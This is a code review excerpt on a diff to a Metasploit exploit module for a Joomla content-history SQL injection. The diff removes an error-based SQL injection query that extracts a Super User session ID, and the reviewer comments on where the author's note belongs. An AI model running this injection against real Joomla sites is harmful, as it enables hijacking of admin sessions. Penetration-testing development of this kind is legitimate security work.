modules/exploits/unix/webapp/joomla_contenthistory_sqli_rce.rb

```diff
@@ -80,7 +80,9 @@ def sqli( tableprefix )
     # The extra search for NOT LIKE '%IS NOT NULL%' is because of our SQL data that's inserted in the session cookie history.
     # This way we make sure that's excluded and we only get real admin sessions.
 
-    sql = " (select 1 FROM(select count(*),concat((select (select concat(session_id)) FROM #{tableprefix}session WHERE data LIKE '%Super User%' AND data NOT LIKE '%IS NOT NULL%' AND userid!='0' AND username IS NOT NULL LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)"
+    # The modified query should resolve previous issues - Michael Maturi
```

Comment:
You can remove this comment and register it in a commit message. It's also kinda implied by the original commit.